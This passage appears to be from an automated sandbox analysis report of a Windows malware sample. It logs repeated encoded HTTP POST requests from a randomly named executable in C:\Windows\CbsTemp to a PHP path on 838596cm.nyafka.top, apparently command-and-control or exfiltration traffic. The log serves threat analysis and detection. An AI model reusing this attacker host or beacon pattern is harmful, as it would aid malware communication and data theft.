                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pz47lUiGRFeK9QfyKphwd2x%2BTPJvJSoTGL3G6hzOoFI9Mn2eim0lxc%2FBSRcuS%2FeBgBvDGmc3nKzPhKugfuyeceaZtpTT62a1kYWl3ZaPGZljTMxZbaY0z7WETAMse%2BnvIb5Kcs0T"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7969cbe2727b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4663&min_rtt=2086&rtt_var=5936&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=64305&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          27192.168.2.550008104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:20.716937065 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          28192.168.2.550010104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:20.866930008 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 1852
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:13:21.223324060 CET1852OUTData Raw: 50 52 5b 55 5c 5a 53 5f 5e 5f 57 54 56 57 59 5e 57 55 58 5f 50 5d 56 5b 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: PR[U\ZS_^_WTVWY^WUX_P]V[[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ X*;($ 2^===X;/>2*;*$++*/"/Y,/#_&'P-
                                                                                                          Jan 8, 2025 17:13:21.610785007 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:21.611258984 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:21.611335039 CET958INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:21 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EZmNRcnRSoo3TSsDk3Juh%2BOvQMgbN3%2FahzufVGwv5XZNlCre9SQdaf%2Bfa0GyrM19HscoOSfUxlOSgyuEeLylo%2Bctdz91GcbTwJGjYc6uxk3zQukNy25dHr6f1BEsZuzl%2F7YubRfY"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed79701be4727b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3353&min_rtt=2081&rtt_var=3326&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2201&delivery_rate=119047&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 39 38 0d 0a 03 1d 24 11 33 04 28 13 37 2b 29 56 3f 39 38 07 3d 33 08 10 39 39 3c 59 25 1d 33 07 32 05 34 5c 23 2f 03 1c 2a 38 07 58 24 0f 33 09 2b 2b 20 5c 04 1f 24 5f 3f 38 0f 1d 3e 06 29 04 27 0d 31 5a 32 0a 24 5d 31 03 01 13 27 3a 39 0d 20 3a 23 13 2f 0d 2e 51 2e 28 0a 1e 3c 37 0e 12 27 2e 2f 50 0f 10 3b 0a 2e 29 0e 00 21 0f 39 0a 22 55 23 1e 37 26 20 5e 2a 2e 30 0d 35 06 32 02 33 55 39 19 21 32 27 55 25 33 37 5d 2b 31 20 54 28 09 24 55 2c 02 2c 49 02 3f 58 52 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 98$3(7+)V?98=399<Y%324\#/*8X$3++ \$_?8>)'1Z2$]1':9 :#/.Q.(<7'./P;.)!9"U#7& ^*.0523U9!2'U%37]+1 T($U,,I?XR0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          29192.168.2.550011104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:21.046741962 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:13:21.404030085 CET2532OUTData Raw: 55 51 5e 52 5c 5d 56 59 5e 5f 57 54 56 56 59 58 57 56 58 5d 50 5a 56 5b 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: UQ^R\]VY^_WTVVYXWVX]PZV[[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ Z((_0#1*=X;$Z)X%Z);![0>+;),4["[(.?#_&'P-
                                                                                                          Jan 8, 2025 17:13:21.611133099 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:21.702506065 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:21.978204012 CET805INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:21 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KWbeIpt5JYrOBt9lVoF1nEYgFbQrICG923L%2Fell2gvIBc1LtENXpsPIXpMWKi7YPUUaIhT5%2BMXFAZEmNEn0wQnig6w%2FudZHUWvTQqJeuzb2I6wAAaGGVY5QkYc39PepN62Vsn9gk"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed79710c70424b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3116&min_rtt=1593&rtt_var=3643&sent=4&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=105966&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          30192.168.2.550013104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:22.108233929 CET325OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Jan 8, 2025 17:13:22.457716942 CET2532OUTData Raw: 55 50 5b 55 59 5d 56 5d 5e 5f 57 54 56 59 59 58 57 51 58 53 50 5b 56 5f 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: UP[UY]V]^_WTVYYXWQXSP[V_[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\#+X$0=*=18'(>.)Z>Y&8>?;Y=,("?\,/#_&'P-
                                                                                                          Jan 8, 2025 17:13:22.580354929 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:22.827003002 CET804INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:22 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=APrQ6N5dF7nfpYMhcmNh8kiIMN3Yy0TJ%2FydxhIxL0iWTf0ZP4GHSBHr9D%2F58HUAqlaKkvdMFKxURaObXkgjc%2FcdHOWTj2giqhfleNqlFGN0c6fZLzN6vcGLP2KaopCtm1NrgzMVn"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7977cc4c0f5b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4352&min_rtt=1658&rtt_var=6011&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2857&delivery_rate=62884&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          31192.168.2.550014104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:23.041907072 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:13:23.395015955 CET2532OUTData Raw: 55 5c 5e 53 5c 5b 56 5b 5e 5f 57 54 56 5c 59 5d 57 52 58 52 50 58 56 51 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: U\^S\[V[^_WTV\Y]WRXRPXVQ[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\#<+]$#Y?-/+[>>1_)(6$;<#>(X >;\-#_&'P-/
                                                                                                          Jan 8, 2025 17:13:23.505584002 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:23.666415930 CET806INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:23 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E1HH6hkVpvUnEOuxQymZHuY01eAnx8XYtmZCXhM4YOA0JE9eAtOwXoaCQOuGzF%2Ba5P1H%2B7ZBBW4ylbicouKRdvBjswDgTZid55RW%2Bt4S6HCL9MzGlpjIuQwp7VOPO9EwluV9n%2F1I"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed797d9eca727b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4036&min_rtt=1986&rtt_var=4845&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=79399&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          32192.168.2.550015104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:23.916335106 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:13:24.273544073 CET2532OUTData Raw: 50 57 5b 57 59 5b 56 5e 5e 5f 57 54 56 56 59 59 57 54 58 58 50 5d 56 5c 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: PW[WY[V^^_WTVVYYWTXXP]V\[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ ^+(7]'01?.%.$/\>.%]*8*'2R?<*<8"+^-?#_&'P-
                                                                                                          Jan 8, 2025 17:13:24.365647078 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:24.602312088 CET802INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:24 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fZO5P5CcVmBdrXLvfmZMPqMA%2BsUFp7Sox2LEf0Xsr3SH%2B9PaNjtoVpa8A99045xoiVU0olrH3QxAg8VKVnOiVW6u0YT9JT3Rm1dYRWSBM1wHY84HoH2zQf3KEq4vKeD262DK0Btu"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed79830ba5729f-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1982&min_rtt=1973&rtt_var=746&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=739989&cwnd=168&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          33192.168.2.550016104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:24.732119083 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:13:25.082448959 CET2532OUTData Raw: 55 51 5e 55 59 5b 56 5b 5e 5f 57 54 56 5c 59 5e 57 56 58 52 50 54 56 50 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: UQ^UY[V[^_WTV\Y^WVXRPTVP[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ _<^ $#=-"/>.==!Z$%+2)<#".#_&'P-/
                                                                                                          Jan 8, 2025 17:13:25.198436975 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:25.429018021 CET807INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:25 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BZeczPGpn3nTb%2Figh0aI7GIcTgyB%2B1lttex62jcIjRBEaGih43Lixhl0OaOAakeBKCiyFxUefUgmTV%2FQgf8Y18CJwtBZq9lIIKkbs5UMkD0wwFnISLeJ5TbnK%2FAHThrjF88ZNzoA"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed79882bc5727b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3509&min_rtt=2040&rtt_var=3703&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=105858&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          34192.168.2.550017104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:25.556583881 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:13:25.910598993 CET2532OUTData Raw: 55 5c 5e 57 59 51 56 5a 5e 5f 57 54 56 5c 59 5c 57 55 58 5e 50 58 56 5f 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: U\^WYQVZ^_WTV\Y\WUX^PXV_[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\#<^+]'#-*>%Z;?*_>9\3+.R+*?".;-?#_&'P-/
                                                                                                          Jan 8, 2025 17:13:26.041353941 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:26.275583982 CET799INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:26 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ljfsTJjjl1CxrLIdpEcxK6kctxPumJIY2dMjjzI1iAMKYB8moPlvQsXwh0uiqrd2JaevM3vk8XUeSxZBiqhbHf4zWOSEYMw5F3mm60OVAHwqwD4YQV3Gz4HUrseXES2gQUtdv209"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed798d7aa90f5b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3252&min_rtt=1653&rtt_var=3819&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=101024&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          35192.168.2.550018104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:26.447091103 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          36192.168.2.550019104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:26.644160986 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 1816
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:13:26.997370958 CET1816OUTData Raw: 55 54 5e 52 59 50 53 5f 5e 5f 57 54 56 5e 59 59 57 57 58 5e 50 59 56 5c 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: UT^RYPS_^_WTV^YYWWX^PYV\[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ Z*8Y'#%)=]/#>.5[(8>0]:R++=?$X6>+-/#_&'P-+
                                                                                                          Jan 8, 2025 17:13:27.115710974 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:27.376766920 CET957INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:27 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GEcb815LGZwhVNkKyiKEr%2FqsEyU2ZMUIZcKWAAib%2BNgFOS6g1QpuowVnSLA0QzBeOzk1zjJ6lC9gPYWeC3wxLtj6ad7ES%2BgahmhVUxdmQgmOQPy%2B09dWk19YY6Pn3epPUpyVv%2FrL"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed79942aaec34f-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3710&min_rtt=1522&rtt_var=4947&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2165&delivery_rate=76733&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
